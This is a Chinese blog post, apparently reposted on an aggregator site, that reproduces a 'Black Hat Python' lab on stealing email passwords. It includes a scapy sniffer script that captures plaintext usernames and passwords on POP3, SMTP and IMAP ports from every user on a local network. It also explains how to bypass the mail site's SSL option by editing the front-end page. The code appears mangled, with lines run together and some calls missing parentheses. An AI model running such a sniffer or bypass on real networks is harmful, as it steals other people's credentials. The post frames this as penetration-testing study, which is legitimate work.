python渗透测试入门之窃取邮箱密码

信息安全不简单鸭2024-04-30 19:41:13  52

近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第8个实验(抓取邮箱密码),我的测试环境是mbp电脑+kali虚拟机+conda开发环境。使用中科大邮箱(备注:马上要高考了,欢迎报考中科大,我们是终身邮箱哦~),这里默认打上了SSL安全登录,修改前端页面代码就可以绕过限制,便能轻松抓取局域网所有用户和密码,前提是取消SSL打勾,现在主流邮箱都已经加密了,所有只有在实验环境下才能成功~

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

1、2015年上学的时候SSL还没有打勾,现在安全要求高了,默认打勾了,需要修改一下前端页面,取消打勾,否则抓取不到明文

2、在mbp上运行脚本,并访问中科大邮箱,就能抓取到邮箱的用户名和密码的明文,如果打勾SSL,就看不到明文了

3、在kali虚拟机上访问中科大邮箱,同样可以抓取到用户名和密码,也就是说只要是局域网里面的所有人访问中科大邮箱,都能抓取到他们的用户名和密码

参考代码:

# -*- coding: utf-8 -*-# @Time : 2022/6/6 7:35 PM# @Author : ailx10# @File : mail_sniffer.pyfrom scapy.all import *from scapy.layers.inet import IP,TCPfrom scapy.config import confconf.use_pcap = Truedef packet_callback(packet): if packet.haslayer(TCP): if packet[TCP].payload: mypacket = str(packet[TCP].payload) if "user" in mypacket.lower or "pass" in mypacket.lower: print(f"[*] Destination :{packet[IP].dst}") print(f"[*] {str(packet[TCP].payload)}")def main: sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)if __name__ == "__main__": main

发布于 2022-06-06 19:54

转载此文是出于传递更多信息目的。若来源标注错误或侵犯了您的合法权益,请与本站联系,我们将及时更正、删除、谢谢。
https://www.414w.com/read/382993.html
0
随机主题
两百元蓝牙降噪耳机 谁更值得买?一年级幸子小场地回合 节奏感越来越好喽梦一、梦八、现役美国男篮外加南斯拉夫男篮同场竞技!IGN评选最佳25款Switch游戏: 王泪第一野炊第二iPhone带手机壳散热不好?不可能,绝对不可能!金属手机壳药厂全队梦游遭完爆, 不败金身被破“龙圣”坠入凡间堪比印钞机! 腾讯员工平均月薪8.3万元, 一季度还净赚419亿新能源起飞了, 发生了什么?肖华: 目睹前夫张艺谋“梅开三度”, 离婚后孤身一人再也不谈感情我不是看的穿越爽剧吗? 怎么学上历史了?神印王座: 龙皓晨晋升七阶, 圣采儿完成神眷觉醒, 阿宝被打败DNF手游: 白嫖“赛丽亚的思念”称号, 新手练级注意事项江苏徐州: 1938年7月, 美国人镜头里的鬼子、汉奸和伪军财政蓝皮书建议调高消费税率: 烟草、奢侈品或迎税收大变革不是首钢, 郭艾伦官宣下家, 李晓旭跟腱断裂, 辽篮奖金排名曝光什么值得买618年中大促开启, 首4小时GMV同比增长214%他是公安部第三任部长, 59岁自杀, 两位公安部副部长受牵连被审查英国官员: 英国不能承受在贸易问题上“冷落”中国的代价2024上半年值回票价的5部电影, 你要是一部都没看, 那就太遗憾了波波维奇是不是被高估的主教练? 邓肯退役后马刺队就一事无成了中国男篮归化爆发 李凯尔成森林狼头号奇兵 替补12分钟7中5太抢镜
最新回复(0)